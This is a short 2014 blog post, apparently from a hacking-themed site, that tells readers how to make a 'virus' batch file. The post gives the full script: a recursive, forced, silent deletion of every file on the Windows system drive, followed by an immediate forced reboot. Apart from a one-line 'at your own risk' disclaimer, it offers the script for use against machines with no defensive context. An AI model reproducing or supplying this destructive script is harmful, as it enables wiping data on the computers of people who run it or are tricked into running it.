Friday, 28 November 2014

create virus to delete local disk c

By : Amandeep Singh Chawla


Friends today im gona show you how to create a virus and clear all the content of "Local disk c" so just follow the steps below:

1.Open the NotePad
2.Coppy the below given code to notepad
3.Save the file named as "Virus.bat".(you can give any name to it but be specific about the extension that it will be .bat  only)
4.save the file and run it.

Code:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

Warning: Try it at your own risk Hacking and cracking will not be responsible for any damage 



No comments:

Post a Comment